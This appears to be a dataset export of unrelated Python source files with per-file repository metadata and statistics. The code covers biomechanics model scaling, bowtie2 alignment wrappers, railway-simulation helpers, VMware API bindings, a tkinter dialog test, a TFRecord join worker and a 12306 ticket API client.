scaleTool.getModelScaler().setTimeRange(TimeArray)
# Indicating whether or not to preserve relative mass between segments
scaleTool.getModelScaler().setPreserveMassDist(1)
# Name of OpenSim model file (.osim) to write when done scaling.
scaleTool.getModelScaler().setOutputModelFileName("")
# Filename to write scale factors that were applied to the unscaled model (optional)
scaleTool.getModelScaler().setOutputScaleFileName(outputScaleFile)
# Run model scaler Tool
scaleTool.getModelScaler().processModel(
aState, aModel, scaleResultsDir, subjectMass)
# initialize
aState = aModel.initSystem()
# # Marker Placer
# # Whether or not to use the model scaler during scale
scaleTool.getMarkerPlacer().setApply(1)
# # Set the marker placer time range
scaleTool.getMarkerPlacer().setTimeRange(TimeArray)
# # Set the marker file (.trc) to be used for scaling
scaleTool.getMarkerPlacer().setStaticPoseFileName("/" + staticMarkerFile)
# # Return name to a variable for future use in functions
scaledAdjustedModel = scaleTool.getMarkerPlacer(
).setOutputModelFileName("/" + outputModelFile)
# # Set the output motion filename
scaleTool.getMarkerPlacer().setOutputMotionFileName("/" + staticCoordinates)
# # Set the output xml of the marker adjustments
scaleTool.getMarkerPlacer().setOutputMarkerFileName("/" + adjustedMarkerSet)
# # Maximum amount of movement allowed in marker data when averaging
scaleTool.getMarkerPlacer().setMaxMarkerMovement(-1)
# # Run Marker Placer
scaleTool.getMarkerPlacer().processModel(aState, aModel, scaleResultsDir)
scaleTool.printToXML(scaleResultsDir + "/" + subID + "_setupScale.xml")
# Clear Terminal
os.system('cls' if os.name == 'nt' else 'clear')
shutil.copy(scaleResultsDir + "/" + outputModelFile, subResultsDir)
return ()
| 38.801527 | 89 | 0.69821 | 501 | 5,083 | 7.061876 | 0.391218 | 0.054268 | 0.013567 | 0.011871 | 0.072923 | 0.054833 | 0.054833 | 0.054833 | 0.054833 | 0.054833 | 0 | 0.00905 | 0.217391 | 5,083 | 130 | 90 | 39.1 | 0.880342 | 0.277592 | 0 | 0.042254 | 0 | 0 | 0.054472 | 0.013761 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014085 | false | 0 | 0.056338 | 0 | 0.084507 | 0.014085 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfbbe34de6cfae26177dec781f0aff1524bf1b1b | 1,666 | py | Python | tirmite/bowtie2_wrappers.py | Adamtaranto/mapmite | e2e85d73fa1df3a1c5d9893f7b35bcb6f6a1558b | [
"MIT"
] | 2 | 2019-05-30T00:46:27.000Z | 2019-12-18T11:01:49.000Z | tirmite/bowtie2_wrappers.py | Adamtaranto/mapmite | e2e85d73fa1df3a1c5d9893f7b35bcb6f6a1558b | [
"MIT"
] | 10 | 2017-09-19T01:24:02.000Z | 2021-04-08T00:35:40.000Z | tirmite/bowtie2_wrappers.py | Adamtaranto/mapmite | e2e85d73fa1df3a1c5d9893f7b35bcb6f6a1558b | [
"MIT"
] | 3 | 2019-12-18T11:01:51.000Z | 2021-09-02T01:26:34.000Z | import os
from shlex import quote
def _bowtie2build_cmd(bt2Path="bowtie2-build",IdxPath="db/GenIdx",genome=None):
'''Construct the bowtie2-build command'''
# Base command
cmd = ' '.join(['mkdir db &&',quote(bt2Path),quote(os.path.abspath(genome)),IdxPath])
return cmd
def _bowtie2_cmd(bt2Path="bowtie2",tirFasta=None,IdxPath="db/GenIdx",cores=None):
'''Construct commands for bowtie2 mapping.'''
# bowtie2 -x genidx -f -a --very-sensitive-local -U TIR.fa --al alignments.bam
# Base command
cmd = ' '.join([quote(bt2Path),'-f -a --very-sensitive-local -x',IdxPath,'-U',quote(os.path.abspath(tirFasta)),'> alignments.sam'])
# Optional set cores
if cores:
cmd += ' --threads ' + str(cores)
return cmd
def _bam2bed_cmd(samPath="samtools",bedPath="bedtools",tempDir=None):
''' Filtering mapped reads with bedtools and samtools.
# Fwd hits
samtools view -b -F 0x10 alignments.sam | bedtools bamtobed -i stdin | awk -v OFS='\t' '{print $1,$2,$3,"+"}' > mapped.bed
# Rev hits
samtools view -b -f 0x10 alignments.sam | bedtools bamtobed -i stdin | awk -v OFS='\t' '{print $1,$2,$3,"-"}' >> mapped.bed
'''
# Base command
mappedPath = os.path.join(tempDir,'bowtie2mappedTIR.bed')
cmds = list()
# All reads not on rev strand or unmapped
cmds.append(' '.join([quote(samPath),"view -b -F 0x10,0x4 alignments.sam |",quote(bedPath),"bamtobed -i stdin | awk -v OFS='\\t' '{print $1,$2,$3,\"+\"}' >",quote(mappedPath)]))
# Only reads on reverse strand
cmds.append(' '.join([quote(samPath),"view -b -f 0x10 alignments.sam |",quote(bedPath),"bamtobed -i stdin | awk -v OFS='\\t' '{print $1,$2,$3,\"-\"}' >>",quote(mappedPath)]))
return cmds,mappedPath
| 47.6 | 178 | 0.676471 | 243 | 1,666 | 4.613169 | 0.374486 | 0.057984 | 0.021409 | 0.035682 | 0.371097 | 0.335415 | 0.335415 | 0.335415 | 0.335415 | 0.271186 | 0 | 0.02686 | 0.128451 | 1,666 | 34 | 179 | 49 | 0.745179 | 0.365546 | 0 | 0.125 | 0 | 0.125 | 0.324952 | 0.021277 | 0 | 0 | 0.010638 | 0 | 0 | 1 | 0.1875 | false | 0 | 0.125 | 0 | 0.5 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfbbe35054b047337e457c136d547a61c6afb53d | 2,716 | py | Python | action_blocking_helping_functions.py | netceteragroup/Flatland-Challenge | 4292e8aa778d264d025ad6d32926840864b22a21 | [
"MIT"
] | 4 | 2021-01-15T10:49:33.000Z | 2021-12-31T08:11:35.000Z | action_blocking_helping_functions.py | netceteragroup/Flatland-Challenge | 4292e8aa778d264d025ad6d32926840864b22a21 | [
"MIT"
] | null | null | null | action_blocking_helping_functions.py | netceteragroup/Flatland-Challenge | 4292e8aa778d264d025ad6d32926840864b22a21 | [
"MIT"
] | null | null | null | from envs.flatland.observations.segment_graph import Graph
def get_coords(direction):
if direction == 0:
return -1, 0
elif direction == 1:
return 0, 1
elif direction == 2:
return 1, 0
elif direction == 3:
return 0, -1
def stop_deadlock_when_unavoidable(timestamp_segment_dict, to_reset, handle, direction, action, action_mask, old_pos):
# print(obs[agent_id][8])
dx, dy = get_new_pos_dx_dy(direction, action)
new_pos = (old_pos[0] + dx, old_pos[1] + dy)
# print(handle, direction, old_pos, new_pos)
fr, to = Graph.agents[handle].CurrentNode, Graph.agents[handle].NextNodes
segments = []
for node in to:
segments.append(Graph.graph_global[fr][node]['segment'])
curr_segment = None
for segment in segments:
for x, y, _ in segment:
if new_pos == (x, y):
curr_segment = segment
break
if curr_segment is None:
return timestamp_segment_dict, to_reset, action
curr_segment = frozenset((x, y) for x, y, _ in curr_segment)
if curr_segment not in timestamp_segment_dict or not timestamp_segment_dict[curr_segment]:
timestamp_segment_dict[curr_segment] = True
# print(f"occupied by {handle} segment: {curr_segment}")
to_reset.append(curr_segment)
else:
# print(f"old action was {action}")
action = pick_new_action(action, action_mask)
# print(f"new action is {action}")
return timestamp_segment_dict, to_reset, action
def reset_timestamp_dict(timestamp_segment_dict, to_reset):
for segment in to_reset:
# print(f"removing segment {segment}")
timestamp_segment_dict[segment] = False
return timestamp_segment_dict
def pick_new_action(old_action, action_mask):
action_mask[old_action - 1] = 0
action_mask[3] = 0
available = [i + 1 for i in range(len(action_mask)) if action_mask[i] == 1]
if len(available) == 0:
return old_action
return available[0]
def get_new_pos_dx_dy(direc, action):
if direc == 2:
if action == 1:
return 0, 1
if action == 2:
return 1, 0
if action == 3:
return 0, -1
if direc == 1:
if action == 1:
return -1, 0
if action == 2:
return 0, 1
if action == 3:
return 1, 0
if direc == 0:
if action == 1:
return 0, -1
if action == 2:
return -1, 0
if action == 3:
return 0, 1
if direc == 3:
if action == 1:
return 1, 0
if action == 2:
return 0, -1
if action == 3:
return -1, 0
| 29.846154 | 118 | 0.591679 | 375 | 2,716 | 4.088 | 0.192 | 0.067841 | 0.117417 | 0.039139 | 0.313112 | 0.193085 | 0.193085 | 0.142205 | 0.142205 | 0.142205 | 0 | 0.033636 | 0.310383 | 2,716 | 90 | 119 | 30.177778 | 0.784837 | 0.082842 | 0 | 0.416667 | 0 | 0 | 0.002818 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069444 | false | 0 | 0.013889 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfbd4529c7fa51f7002af4f36973add53c6da978 | 997 | py | Python | venv/lib/python2.7/site-packages/ebcli/objects/event.py | zwachtel11/fruitful-backend | 45b8994917182e7b684b9e25944cc79c9494c9f3 | [
"MIT"
] | 4 | 2018-04-19T19:56:53.000Z | 2021-06-28T19:53:41.000Z | venv/lib/python2.7/site-packages/ebcli/objects/event.py | zwachtel11/fruitful-backend | 45b8994917182e7b684b9e25944cc79c9494c9f3 | [
"MIT"
] | 1 | 2020-06-03T13:57:07.000Z | 2020-06-22T10:27:48.000Z | venv/lib/python2.7/site-packages/ebcli/objects/event.py | zwachtel11/fruitful-backend | 45b8994917182e7b684b9e25944cc79c9494c9f3 | [
"MIT"
] | 3 | 2018-07-30T05:34:42.000Z | 2019-04-30T20:02:54.000Z | # Copyright 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
class Event():
def __init__(self, message=None, event_date=None, version_label=None,
app_name=None, environment_name=None, severity=None, platform=None):
self.message = message
self.event_date = event_date
self.version_label = version_label
self.app_name = app_name
self.environment_name = environment_name
self.severity = severity
self.platform = platform
| 39.88 | 85 | 0.718154 | 141 | 997 | 4.964539 | 0.524823 | 0.085714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010101 | 0.205617 | 997 | 24 | 86 | 41.541667 | 0.873737 | 0.537613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfbdb2606c7d9fbb6e570e314eadff3809426b49 | 13,493 | py | Python | com/vmware/vapi/bindings/struct.py | sumitrsystems/Vmware | 7705d9979bee71f02c71d63890616409044cba08 | [
"MIT"
] | null | null | null | com/vmware/vapi/bindings/struct.py | sumitrsystems/Vmware | 7705d9979bee71f02c71d63890616409044cba08 | [
"MIT"
] | null | null | null | com/vmware/vapi/bindings/struct.py | sumitrsystems/Vmware | 7705d9979bee71f02c71d63890616409044cba08 | [
"MIT"
] | null | null | null | """
Bindings data classes
"""
__author__ = 'VMware, Inc.'
__copyright__ = 'Copyright 2015-2016 VMware, Inc. All rights reserved. -- VMware Confidential' # pylint: disable=line-too-long
import decimal
import json
import six
import sys
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.serializers import cleanjson
from vmware.vapi.data.value import StructValue
from vmware.vapi.lib.converter import Converter
# TODO: Split this into static and dynamic structures.
class VapiStruct(object):
"""
Representation of IDL Structure in python language bindings
"""
_validator_list = []
# Dict of canonical to pep names for fields whose canonical name does not
# match the pep name
_canonical_to_pep_names = {}
def __init__(self, struct_value=None, rest_converter_mode=None):
"""
Initialize VapiStruct
:type mappings: :class:`dict` or :class:`None`
:param mappings: A mapping for all field names whose canonical name does
not match PEP8 standard name
:type rest_converter_mode: :class:`str` or :class:`None`
:param rest_converter_mode: Converter mode to be used to be be
compatible for Vapi Rest. If None or unknown string value,
then the default Json Rpc converter is used
:type struct_value: :class:`vmware.vapi.data.value.StructValue`
:param struct_value: StructValue to be used for VapiStruct
or :class:`None`
"""
# fields will either be in native form or in unknown
# fields
self._extra_fields = None
if (struct_value is not None and
not isinstance(struct_value, StructValue)):
raise TypeError(
'struct_value must be of type '
+ '\'vmware.vapi.data.value.StructValue\' or None')
self._struct_value = struct_value
self._rest_converter_mode = rest_converter_mode
def get_field(self, attr):
"""
Returns the struct field value
:type attr: :class:`str`
:param attr: Canonical field name
:rtype: :class:`object`
:return: Field value
"""
if (self._canonical_to_pep_names and
attr in self._canonical_to_pep_names):
return getattr(self, self._canonical_to_pep_names[attr])
else:
return getattr(self, attr)
@classmethod
def validate_struct_value(cls, struct_value):
"""
Validate if the given struct value satisfies all
the constraints of this VapiStruct.
:type struct_value: :class:`vmware.vapi.data.value.StructValue`
:param struct_value: StructValue to be validated
:type validators: :class:`list` of
:class:`vmware.vapi.data.validator.Validator`
:param validators: List of validators
:raise :class:`vmware.vapi.exception.CoreException` if a constraint is
not satisfied
"""
if cls._validator_list:
for validator in cls._validator_list:
msg_list = validator.validate(struct_value, None)
raise_core_exception(msg_list)
def validate_constraints(self):
"""
Validate if the current VapiStruct instance satisfies all the
constraints of this VapiStruct type.
:raise :class:`vmware.vapi.exception.CoreException` if a constraint is
not satisfied
"""
struct_value = self.get_struct_value()
self.validate_struct_value(struct_value)
@classmethod
def get_binding_type(cls):
"""
Returns the corresponding BindingType for the VapiStruct class
:rtype: :class:`vmware.vapi.bindings.type.BindingType`
:return: BindingType for this VapiStruct
"""
return getattr(cls, '_binding_type', None)
@classmethod
def _set_binding_type(cls, binding_type):
"""
Set the underlying BindingType for this VapiStruct.
:type binding_type: :class:`vmware.vapi.bindings.type.BindingType`
:param binding_type: BindingType for this VapiStruct
"""
cls._binding_type = binding_type
def get_struct_value(self):
"""
Returns the corresponding StructValue for the VapiStruct class
:rtype: :class:`vmware.vapi.data.value.StructValue`
:return: StructValue for this VapiStruct
"""
# For dynamic structures
if self._struct_value:
return self._struct_value
else:
# For static structures import TypeConverter here since
# otherwise it causes circular imports
from vmware.vapi.bindings.converter import TypeConverter
struct_value = TypeConverter.convert_to_vapi(
py_val=self, binding_type=self._binding_type)
return struct_value
def _get_extra_fields(self):
"""
Get the fields that are not part of the static definition for this
VapiStruct. This is an internal method and should only be used by vAPI
runtime.
:rtype :class:`dict` of :class:`str` and
:class:`vmware.vapi.data.value.DataValue`
:return Fields not part of the static definition for this VapiStruct
"""
return self._extra_fields or {}
def _set_extra_fields(self, extra_fields=None):
"""
Set the fields that are not part of the static definition for this
VapiStruct. This is an internal method and should only be used by vAPI
runtime.
:type extra_fields: :class:`dict` of :class:`str` and
:class:`vmware.vapi.data.value.DataValue` or :class:`None`
:param extra_fields: Fields not part of the static definition for
this VapiStruct
"""
self._extra_fields = extra_fields
@classmethod
def _get_pep_name(cls, canonical_name):
"""
Return the pep name for the provided canonical name
:rtype: :class:`str`
:return: Pep name used in the binding
"""
if (cls._canonical_to_pep_names
and canonical_name in cls._canonical_to_pep_names):
return cls._canonical_to_pep_names[canonical_name]
else:
return Converter.canonical_to_pep(canonical_name)
def convert_to(self, cls):
"""
Convert the underlying StructValue to an instance of the provided class
if possible. Conversion will be possible if the StructValue contains
all the fields expected by the provided class and the type of the value
in each fields matches the type of the field expected by the provided
class.
:type cls: :class:`vmware.vapi.data.value.StructValue`
:param cls: The type to convert to
:rtype: :class:'vmware.vapi.bindings.struct.VapiStruct'
:return: The converted value
"""
# Import TypeConverter here since otherwise it causes circular imports
from vmware.vapi.bindings.converter import TypeConverter
return TypeConverter.convert_to_python(
vapi_val=self.get_struct_value(),
binding_type=cls.get_binding_type(),
rest_converter_mode=self._rest_converter_mode)
def to_json(self):
"""
Convert the object into a json string.
:rtype: :class:`str`
:return: JSON string representation of this object
"""
struct_value = self.get_struct_value()
return cleanjson.DataValueConverter.convert_to_json(struct_value)
def to_dict(self):
"""
Convert the object into a python dictionary. Even the nested types
are converted to dictionaries.
:rtype: :class:`dict`
:return: Dictionary representation of this object
"""
# TODO: Implement native converter from DataValue -> Dictionary
# to improve performance if it is used heavily
return json.loads(self.to_json(), parse_float=decimal.Decimal)
def _get_attrs(self):
"""
Returns the attributes of the vAPI structure object
:rtype: :class:`list` of :class:`str`
:return: List of attributes of this object
"""
# Using getmembers in inspect to return all the attributes
# of this object. And later filter those to get only the
# public data attributes
return [k for k in six.iterkeys(vars(self))
if not k.startswith('_')]
def __eq__(self, other):
if other is None:
return False
for attr in self._get_attrs():
if getattr(self, attr) != getattr(other, attr):
return False
return True
def __ne__(self, other):
return not (self == other)
def __repr__(self):
class_name = self.__class__.__name__
attrs = self._get_attrs()
result = ', '.join(
['%s=%s' % (attr, repr(getattr(self, attr)))
for attr in attrs])
return '%s(%s)' % (class_name, result)
def __str__(self):
attrs = self._get_attrs()
result = ', '.join(
['%s : %s' % (attr, str(getattr(self, attr)))
for attr in attrs])
return '{%s}' % result
def __hash__(self):
return str(self).__hash__()
class PrettyPrinter(object):
"""
Helper class to pretty print Python native values (with special support
for VapiStruct objects).
"""
def __init__(self, stream=sys.stdout, indent=2):
"""
Initialize PrettyPrinter
:type stream: :class:`object`
:param stream: A stream object that implements File protocol's
write operation
:type indent: :class:`int`
:param indent: Indentation to be used for new lines
"""
self._stream = stream
self._indent = indent
def pprint(self, value, level=0):
"""
Print a Python native value
:type value: :class:`vmware.vapi.bindings.struct.VapiStruct`
:param value: VapiStruct to be pretty printed
:type level: :class:`int`
:param level: Indentation level
"""
self._process_value(value, level)
def _print_level(self, value, level, newline=True):
"""
Print data at a given identation level
:type value: :class:`str`
:param value: String to be printed
:type level: :class:`int`
:param level: Indentation level
:type newline: :class:`bool`
:param newline: If true, prints a new line after the data. If false,
only prints the data
"""
if level:
self._stream.write(' ' * level + value)
else:
self._stream.write(value)
if newline:
self._stream.write('\n')
def _process_value(self, value, level=0):
"""
Process a value
:type value: :class:`object`
:param value: Value to be processed
:type level: :class:`int`
:param level: Indentation level
"""
if isinstance(value, VapiStruct):
self._pprint_struct(value, level + self._indent)
elif isinstance(value, dict):
self._pprint_dict(value, level + self._indent)
elif isinstance(value, list):
self._pprint_list(value, level + self._indent)
elif isinstance(value, six.string_types):
self._print_level("'%s'," % value, 0)
elif isinstance(value, six.integer_types):
self._print_level('%s,' % value, 0)
elif value is None:
self._print_level('None,', 0)
else:
self._print_level('%s,' % value, level)
def _pprint_struct(self, value, level=0):
"""
Pretty print a struct
:type value: :class:`vmware.vapi.bindings.struct.VapiStruct`
:param value: Value to be processed
:type level: :class:`int`
:param level: Indentation level
"""
class_name = value.__class__.__name__
self._print_level(class_name + '(', 0)
for k in sorted(value._get_attrs()): # pylint: disable=W0212
v = getattr(value, k)
self._print_level('%s=' % k, level, False)
self._process_value(v, level)
self._print_level('),', level - self._indent)
def _pprint_dict(self, value, level=0):
"""
Pretty print a dictionary
:type value: :class:`dict`
:param value: Value to be processed
:type level: :class:`int`
:param level: Indentation level
"""
if not value:
self._print_level('{},', 0)
return
self._print_level('{', 0)
for k in sorted(value.keys()):
self._print_level("'%s':" % k, level, False)
self._process_value(value[k], level)
self._print_level('},', level - self._indent)
def _pprint_list(self, value, level=0):
"""
Pretty print a list
:type value: :class:`list`
:param value: Value to be processed
:type level: :class:`int`
:param level: Indentation level
"""
if not value:
self._print_level('[],', 0)
return
self._print_level('[', 0)
for v in value:
self._print_level('', level, False)
self._process_value(v, level)
self._print_level('],', level - self._indent)
| 34.955959 | 128 | 0.613207 | 1,607 | 13,493 | 4.969508 | 0.148102 | 0.038567 | 0.026296 | 0.019033 | 0.378162 | 0.339344 | 0.299274 | 0.269472 | 0.240671 | 0.204358 | 0 | 0.002849 | 0.29771 | 13,493 | 385 | 129 | 35.046753 | 0.839911 | 0.416957 | 0 | 0.175325 | 0 | 0 | 0.031823 | 0 | 0 | 0 | 0 | 0.005195 | 0 | 1 | 0.168831 | false | 0 | 0.064935 | 0.012987 | 0.396104 | 0.149351 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfc43a6e6874e02847e5dd1f797f3d3037107d33 | 1,572 | py | Python | tests/test_tk_file_extention_dialog.py | MaxWeise/Filebackup_Automation | fc4b7480897b34b1b3315f5505c0b96c8714202d | [
"MIT"
] | null | null | null | tests/test_tk_file_extention_dialog.py | MaxWeise/Filebackup_Automation | fc4b7480897b34b1b3315f5505c0b96c8714202d | [
"MIT"
] | null | null | null | tests/test_tk_file_extention_dialog.py | MaxWeise/Filebackup_Automation | fc4b7480897b34b1b3315f5505c0b96c8714202d | [
"MIT"
] | null | null | null | #!/usr/bin/env python
""" Testsuite for the user text input
Created 15.12.2021
@author Max Weise
"""
import unittest
from unittest import TestCase
from backup_script.tk_file_extention_dialog import TextInputDialog
class Test_TextInputDialog(TestCase):
""" Testcase for the custom tkinter text input dialog."""
__UNDER_TEST: TextInputDialog
def setUp(self) -> None:
""" Setup an instance of the text input dialog."""
self.__UNDER_TEST = TextInputDialog(title='Test Instance')
def test_get_user_input(self) -> None:
""" Test that the userinput is correct and gets returned as list of strings."""
self.__UNDER_TEST.set_contents_input_dialog('Test Submit Button') # Mock the userinput
expected = ['Test', 'Submit', 'Button']
self.__UNDER_TEST.run()
actual = self.__UNDER_TEST.get_user_input()
self.assertTrue(len(actual) > 0)
self.assertEqual(len(actual), 3)
self.assertAlmostEqual(actual.sort(), expected.sort())
self.assertEqual(self.__UNDER_TEST.exit_code, 0)
def test_cancle_button(self) -> None:
""" Test the behaviour of the canlce button."""
self.__UNDER_TEST.set_contents_input_dialog('Test Cancle Button') # Mock the userinput
expected = []
self.__UNDER_TEST.run()
actual = self.__UNDER_TEST.get_user_input()
self.assertEqual(len(actual), 0)
self.assertEqual(actual, expected)
self.assertEqual(self.__UNDER_TEST.exit_code, 1)
if __name__ == '__main__':
unittest.main()
| 30.230769 | 97 | 0.681934 | 198 | 1,572 | 5.111111 | 0.383838 | 0.088933 | 0.115613 | 0.047431 | 0.37747 | 0.249012 | 0.249012 | 0.177866 | 0.100791 | 0.100791 | 0 | 0.010492 | 0.211832 | 1,572 | 51 | 98 | 30.823529 | 0.806295 | 0.215649 | 0 | 0.153846 | 0 | 0 | 0.060884 | 0 | 0 | 0 | 0 | 0 | 0.269231 | 1 | 0.115385 | false | 0 | 0.115385 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfc5e0326ff06b4f88532664293de1aca3963505 | 3,993 | py | Python | efls-data/xfl/data/local_join/worker.py | finalljx/Elastic-Federated-Learning-Solution | fb588fdc03a2c1598b40b36712b27bdffdd24258 | [
"Apache-2.0"
] | null | null | null | efls-data/xfl/data/local_join/worker.py | finalljx/Elastic-Federated-Learning-Solution | fb588fdc03a2c1598b40b36712b27bdffdd24258 | [
"Apache-2.0"
] | null | null | null | efls-data/xfl/data/local_join/worker.py | finalljx/Elastic-Federated-Learning-Solution | fb588fdc03a2c1598b40b36712b27bdffdd24258 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
from typing import List
import tensorflow_io
import tensorflow as tf
from tensorflow.python.platform import gfile
from xfl.data.local_join.aux_table import AuxTable
from xfl.data.local_join import utils
from xfl.data.local_join.sharding import FileSharding
from xfl.common.logger import log
tf.compat.v1.enable_eager_execution()
class LocalJoinWorker(object):
def __init__(self,
input_dir: str,
output_dir: str,
worker_idx: int,
worker_num: int,
left_keys: list,
aux_tables: List[AuxTable],
):
self.input_dir = input_dir
self.output_dir = output_dir
self.aux_tables = aux_tables
self.worker_idx = worker_idx
self.worker_num = worker_num
self.left_keys = left_keys
self.shard_to_process = []
if not len(left_keys) == len(aux_tables):
raise RuntimeError('left_keys size must be equal with aux_table size {}, got {}'
.format(len(aux_tables), len(left_keys)))
def open(self):
utils.assert_valid_dir(path=self.input_dir)
if not gfile.Exists(self.output_dir):
gfile.MakeDirs(self.output_dir)
for t in self.aux_tables:
t.open()
sharding = FileSharding()
self.shard_to_process = sharding.shard(worker_idx=self.worker_idx,
worker_num=self.worker_num,
input_path=self.input_dir,
output_path=self.output_dir)
log.info("worker {} will process {} shards...".format(self.worker_idx, len(self.shard_to_process)))
def run(self):
for shard in self.shard_to_process:
log.info("read file {}, and begin writing to file {}.".format(shard[0], shard[1]))
if not gfile.Exists(shard[0]):
raise RuntimeError("file {} does not exist, please check input data.".format(shard[0]))
if not gfile.Exists(os.path.dirname((shard[1]))):
gfile.MakeDirs(os.path.dirname(shard[1]))
writer = tf.io.TFRecordWriter(shard[1])
dataset = tf.data.TFRecordDataset(shard[0])
for raw_record in dataset:
example = tf.train.Example()
example.ParseFromString(raw_record.numpy())
for k, t in zip(self.left_keys, self.aux_tables):
if k not in example.features.feature:
raise RuntimeError("key col {} is not in input record, please check your data.".format(k))
if not example.features.feature[k].WhichOneof('kind')=='bytes_list':
raise RuntimeError("key col {} type must be bytes_list, but got {}".format(k, example.features.feature[k].WhichOneof('kind')))
if not len(example.features.feature[k].bytes_list.value) == 1:
raise RuntimeError("key col {} length must be 1, but got {}".format(k, len(example.features.feature[k].bytes_list.value)))
example_right_str = t.get(example.features.feature[k].bytes_list.value[0])
if example_right_str is not None:
example_right = tf.train.Example()
example_right.ParseFromString(example_right_str)
example.MergeFrom(example_right)
writer.write(example.SerializeToString())
writer.close()
log.info("write to file {} end.".format(shard[1]))
| 46.430233 | 138 | 0.650889 | 539 | 3,993 | 4.680891 | 0.326531 | 0.022196 | 0.052319 | 0.045581 | 0.114546 | 0.075704 | 0.046373 | 0.031708 | 0 | 0 | 0 | 0.006816 | 0.2284 | 3,993 | 85 | 139 | 46.976471 | 0.812074 | 0.167042 | 0 | 0 | 0 | 0 | 0.110843 | 0 | 0 | 0 | 0 | 0 | 0.014706 | 1 | 0.044118 | false | 0 | 0.132353 | 0 | 0.191176 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfc67912cacb053d18b81a8c4ccd2fa05884f9dd | 8,528 | py | Python | wifi12306.py | Arnie97/emu-screenshot-server | a50526c0d852cd61050ba2926d43c84241d57afb | [
"MIT"
] | 42 | 2018-01-16T10:48:58.000Z | 2020-08-28T07:34:56.000Z | wifi12306.py | Arnie97/emu-screenshot | a50526c0d852cd61050ba2926d43c84241d57afb | [
"MIT"
] | 1 | 2018-11-12T06:20:50.000Z | 2018-11-12T06:45:30.000Z | wifi12306.py | Arnie97/emu-screenshot | a50526c0d852cd61050ba2926d43c84241d57afb | [
"MIT"
] | 4 | 2018-06-09T02:29:45.000Z | 2020-08-07T11:47:52.000Z | #!/usr/bin/env python3
from datetime import date
from itertools import chain
from operator import itemgetter
from os.path import commonprefix
from tickets import API
from typing import Any, Iterable, Dict, List, Optional, Tuple
from util import repl, AttrDict
COMMENT_MAPPING = {
'A': "",
'B': "宿",
'C': "广",
'D': "办",
'E': "宿广",
'F': "",
'G': "",
'H': "联运",
'I': "回转",
'J': "",
'K': "广办",
'L': "欠",
'M': "",
'N': "残",
'O': "残广",
'P': "残办",
'Q': "静",
}
class Wifi12306(API):
'https://wifi.12306.cn/wifiapps/ticket/api/'
def __init__(self):
super().__init__()
self.headers.update({
'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.20(0x18001428) NetType/4G Language/zh_CN',
})
def request(self, *args, json=True, **kwargs):
resp = super().request(*args, json=json, **kwargs)
if not json:
return resp
if resp.get('status', -1):
raise APIError(resp.get('error'))
return resp.get('data')
@staticmethod
def yyyymmdd_format(date: date) -> str:
return date.isoformat().replace('-', '')
@staticmethod
def from_yyyymmdd_format(s: str) -> date:
